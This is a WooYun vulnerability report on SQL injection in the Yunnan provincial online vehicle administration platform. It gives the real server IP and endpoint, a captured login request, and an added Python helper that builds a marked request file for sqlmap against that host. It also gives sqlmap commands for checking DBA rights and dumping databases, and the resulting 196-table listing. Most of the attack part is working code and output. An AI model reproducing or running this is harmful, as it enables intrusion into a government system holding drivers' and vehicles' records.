
Vulnerability Summary

Defect ID: wooyun-2014-081411

Title: 云南省网上车管服务平台 (Yunnan Provincial Online Vehicle Administration Service Platform) SQL injection

Affected vendor: 云南省网上车管服务平台

Author: 路人甲

Submitted: 2014-10-31 12:42

Fix time: 2014-12-15 12:44

Published: 2014-12-15 12:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2014-10-31: Details sent to the vendor, awaiting the vendor's handling
2014-11-05: Vendor confirmed; details visible to the vendor only
2014-11-15: Details opened to core white hats and domain experts
2014-11-25: Details opened to ordinary white hats
2014-12-05: Details opened to intern white hats
2014-12-15: Details opened to the public

Brief description:

Detailed description:

Injection point: http://220.163.43.25/vwss/desktop/wssextdesktop.jsp
Login page

[Screenshot 1.jpg: login page]


Submit the login form and capture the request in Burp.
POST request:

POST /vwss/RVSServlet HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://220.163.43.25/vwss/desktop/wssextdesktop.jsp
Accept: text/javascript, text/html, application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 220.163.43.25
Content-Length: 209
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=4EFE369A03A29FEEEDD29FA482ABA858-n1; CNZZDATA3933438=cnzz_eid%3D386273344-1414585947-http%253A%252F%252F220.163.43.25%252F%26ntime%3D1414585947
rvscmd=com.rivs.wssmem.security.UserLogin.orgLogin%252528%25255B%252522aaa%252522%25252C%252522aaa%252522%25252C%2525223CKV%25253BCDE1B0DF825C18181632AE399261162C31343134353836303037373635%252522%25255D%252529


Decoding the POST data in Burp Decoder (three rounds of URL decoding: each %25 in the capture is one more layer wrapped around a %) gives:

rvscmd=com.rivs.wssmem.security.UserLogin.orgLogin(["aaa","aaa","3CKV;CDE1B0DF825C18181632AE399261162C31343134353836303037373635"])


Then put sqlmap's custom injection marker * after the username and the password value (aaa and aaa here), inside the still-encoded parameter:

rvscmd=com.rivs.wssmem.security.UserLogin.orgLogin%252528%25255B%252522aaa*%252522%25252C%252522aaa*%252522%25252C%2525223CKV%25253BCDE1B0DF825C18181632AE399261162C31343134353836303037373635%252522%25255D%252529


Feed the request to sqlmap: the username value (the first *) is injectable.

[Screenshot 2.jpg: sqlmap output]


The database account has DBA privileges.
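To make the decode, mark and re-encode step above reproducible, here is an added helper. It is my example, not code from the original report or from the platform. It peels the three layers of URL encoding off the captured rvscmd value, parses the RPC-style call (fully qualified Java method name followed by a JSON array of arguments), appends sqlmap's * custom injection marker to the chosen arguments, re-applies exactly the number of encoding layers the capture had, and assembles a raw request file for sqlmap -r. The captured value, the marker positions, the host and the servlet path are taken from the report; the session cookie placeholder and the reduced header set are my assumptions, and the JSESSIONID shown in the capture was only valid at the time, so a live cookie must be supplied.

```python
import json
import re
from urllib.parse import quote, unquote

# rvscmd value from the captured login POST in the report: the RPC-style call is
# URL-encoded three times (%252528 -> %2528 -> %28 -> "(").
CAPTURED_RVSCMD = (
    "com.rivs.wssmem.security.UserLogin.orgLogin%252528%25255B%252522aaa%252522%25252C"
    "%252522aaa%252522%25252C%2525223CKV%25253BCDE1B0DF825C18181632AE399261162C"
    "31343134353836303037373635%252522%25255D%252529"
)
# The same value after the report's author put a '*' marker on both credentials.
MARKED_FROM_REPORT = (
    "com.rivs.wssmem.security.UserLogin.orgLogin%252528%25255B%252522aaa*%252522%25252C"
    "%252522aaa*%252522%25252C%2525223CKV%25253BCDE1B0DF825C18181632AE399261162C"
    "31343134353836303037373635%252522%25255D%252529"
)

# "pkg.Class.method([ ...JSON array of arguments... ])" as sent in rvscmd.
RPC_CALL = re.compile(r"^(?P<method>[\w.]+)\((?P<args>\[.*\])\)$", re.S)


def peel_url_encoding(value, max_layers=10):
    """URL-decode repeatedly until the string stops changing.

    Returns (plain_value, number_of_layers_removed)."""
    layers = 0
    while layers < max_layers:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers


def parse_rvscmd(plain):
    """Split a decoded rvscmd into (fully qualified method name, argument list)."""
    m = RPC_CALL.match(plain)
    if m is None:
        raise ValueError("not an rvscmd method call: %r" % plain[:80])
    return m.group("method"), json.loads(m.group("args"))


def build_rvscmd(method, args):
    """Inverse of parse_rvscmd; compact separators match what the client sends."""
    return "%s(%s)" % (method, json.dumps(args, separators=(",", ":")))


def mark_for_sqlmap(captured, positions, marker="*"):
    """Append sqlmap's custom injection marker to the string arguments at `positions`
    and re-encode with exactly as many URL-encoding layers as the captured value had,
    keeping the marker itself unencoded so sqlmap can find it."""
    plain, layers = peel_url_encoding(captured)
    method, args = parse_rvscmd(plain)
    for i in positions:
        if not isinstance(args[i], str):
            raise TypeError("argument %d is %s, not a string" % (i, type(args[i]).__name__))
        args[i] += marker
    marked = build_rvscmd(method, args)
    for _ in range(layers):
        marked = quote(marked, safe=marker)
    return marked


def sqlmap_request(marked_rvscmd, session_cookie,
                   host="220.163.43.25", path="/vwss/RVSServlet"):
    """Raw HTTP/1.1 request for `sqlmap -r`, with Content-Length recomputed for the
    marked body. Only a subset of the captured headers is reproduced (assumption)."""
    body = "rvscmd=" + marked_rvscmd
    lines = [
        "POST %s HTTP/1.1" % path,
        "Host: %s" % host,
        "X-Requested-With: XMLHttpRequest",
        "Content-Type: application/x-www-form-urlencoded; charset=utf-8",
        "Cookie: %s" % session_cookie,
        "Content-Length: %d" % len(body),
    ]
    return "\r\n".join(lines) + "\r\n\r\n" + body


if __name__ == "__main__":
    # Mark argument 0 (username) and 1 (password) as in the report; argument 2 is left alone.
    marked = mark_for_sqlmap(CAPTURED_RVSCMD, [0, 1])
    assert marked == MARKED_FROM_REPORT
    # Placeholder cookie: replace with a live session before saving this as req.txt.
    print(sqlmap_request(marked, "JSESSIONID=<live session id>"))
```

Redirect the output to req.txt after substituting a live session cookie, then run sqlmap -r req.txt --is-dba --dbs (and --tables -D YNVEHWSS to reproduce the table listing below). The markers sit in the outermost encoding layer, where the report's author placed them, so sqlmap substitutes its payloads at that point and the server's own repeated decoding is applied to them as well; a payload that itself contains a % would be decoded further by the server, which is the case to watch for if a tamper script becomes necessary.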

Proof of concept:

Databases

[Screenshot 3.jpg: database listing]


Tables:

Database: YNVEHWSS
[196 tables]
+--------------------------+
| CMS_DOCA |
| PQ_BLOCKIPS |
| RIVS_PKGSENDQ_HIS |
| RVSWX_MSRV |
| TC_CODE_TJYY |
| TXP_ELEMENT_XPJBAK |
| VEH_VEHICLE |
| AF01 |
| AF02 |
| CG01 |
| CG02 |
| CG03 |
| CG04 |
| CG04D |
| CG05 |
| CMS_CHN |
| CMS_CNT |
| CMS_CNT_BAK |
| CMS_DOC_BAK |
| DRIVINGLICENSE_HHZD |
| DRV_DRIVINGLICENSE |
| DRV_LEARNER_VEHICLE |
| DRV_PRE_HH005TMP |
| DRV_SCHOOLINFO |
| DRV_VIOACD |
| EB_REG_CATALOG |
| EB_REG_OSN |
| EC01 |
| EP01 |
| EP01_20140429 |
| EP01_HS |
| EP01_HSOK |
| EP01_SW |
| EP01_TEMP |
| EP01_XPJ3 |
| EP02 |
| EP02B |
| EP03 |
| EP04 |
| EP05 |
| EP06 |
| EP10 |
| EP12 |
| EP13 |
| EP20 |
| EP21 |
| FG01 |
| FG01HIS |
| FM01 |
| FM02 |
| FM03 |
| HHGZ_TMP |
| MS01 |
| MS02 |
| MS05 |
| PB01 |
| PB02 |
| PB03 |
| PB04 |
| PB05 |
| PB06 |
| PB11 |
| PC01 |
| PC02 |
| PQ_AD |
| PQ_BLOCKLOG |
| PQ_CONTACT |
| PQ_KEYD |
| PQ_KEYD_EXTADD |
| PQ_KEYSYN |
| PQ_KEYV |
| PQ_KEYV_EXTADD |
| PQ_QLIST |
| PQ_QLISTVIO |
| PQ_VERIFYLOG |
| QA01 |
| RIVS_ACLOG |
| RIVS_ACLOG_HS |
| RIVS_N2N |
| RIVS_PKGMSGBUFFER |
| RIVS_PKGMSGBUFFER_HIS |
| RIVS_PKGMSGBUFFER_HIS3 |
| RIVS_PKGRECEIVEQ |
| RIVS_PKGRECEIVEQ_HIS |
| RIVS_PKGRECEIVEQ_HIS3 |
| RIVS_PKGSENDQ |
| RIVS_PKGSENDQ_HIS3 |
| RIVS_PKGTASKLOG |
| RIVS_RPCBRIDGE |
| RIVS_RPCBRIDGEBUF |
| RIVS_RPCBRIDGE_BAK |
| RIVS_SEQUENCE |
| RIVS_SYSCHK |
| RIVS_SYSCHKLOG |
| RIVS_TASK |
| RIVS_TASKPARAM |
| RIVS_TASKRUNLOGS |
| RIVS_TASKRUNS |
| RVMSE_MLOG |
| RVMSE_RQ |
| RVMSE_SQ |
| RVMSE_TMP |
| RVMS_ADB |
| RVMS_ADEXT |
| RVMS_ADGAD |
| RVMS_ADTAGS |
| RVMS_CNT |
| RVMS_D |
| RVMS_ERRORTEL |
| RVMS_KEYWORD |
| RVMS_MLOG |
| RVMS_MSISENDBILL |
| RVMS_MSRV |
| RVMS_MSRVATTRIBUTE |
| RVMS_SQEMAIL |
| RVMS_SQHIS |
| RVSWX_SP01 |
| RVSWX_SP01HIS |
| RVSWX_SP02 |
| RVSWX_TPL |
| SB01 |
| SB02 |
| SC01 |
| SC10 |
| SG01 |
| SG01_XPJBAK |
| SG02 |
| SG02_BAK201404 |
| SG03 |
| SG03E |
| SG03_XPJBAK |
| SG04 |
| SG06 |
| SG07 |
| SG08 |
| SL01 |
| SL02 |
| SL03 |
| SL05 |
| SM01 |
| SM02 |
| SM03 |
| SMS0451B |
| SP01 |
| SP02 |
| SP03 |
| SP04 |
| SP10 |
| SP21 |
| SP30 |
| SS01 |
| TC_CODE |
| TC_CODE5325 |
| TC_CODE_2013 |
| TC_CODE_BAK |
| TC_CODE_BAK53 |
| TC_CODE_CX |
| TC_CODE_CXJX |
| TC_CODE_DBL |
| TC_CODE_JLC5325 |
| TC_CODE_JLCA |
| TC_CODE_KD |
| TC_CODE_LC |
| TC_CODE_LJ |
| TC_CODE_PE |
| TC_CODE_TEST |
| TC_CODE_TJYY2 |
| TC_CODE_WS |
| TC_CODE_XP201205 |
| TC_CODE_XPJ |
| TC_DVCNT |
| TC_PRINTPARAM |
| TC_WORKDAY |
| TD_PRERECORD_EXPHH |
| TD_PRERECORD_HS |
| TD_PRERECORD_XPJCHK |
| TD_PRERECORD_XPJCHK2 |
| TD_PREREAORD |
| TS_YX_EP02 |
| TS_YX_EP03 |
| TS_YX_EP04 |
| TV_PRERECORD |
| TV_REPMENT |
| TXP_ELEMENT |
| TXP_ELEMENTVLE_RV |
| TXP_ELEMENTVLE_RV_XPJBAK |
| TXP_ENTITY |
| TXP_ENTITYREC |
| TXP_ENTITYREC_XPJBAK |
| VEHICLE_HHZD |
| VEHTYPE |
| VIO_CODEWFDM |
| WM01 |
| XPJTEST1 |
| YYJC_VEH |
| YYJC_VEH_B |
+--------------------------+

Fix recommendation:

Copyright: please credit the source 路人甲@乌云 when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2014-11-05 08:20

Vendor reply:

CNVD has confirmed and reproduced the described issue and has forwarded it through CNCERT to the Yunnan branch centre, which will coordinate handling with the website's operating unit.

Latest status:

None yet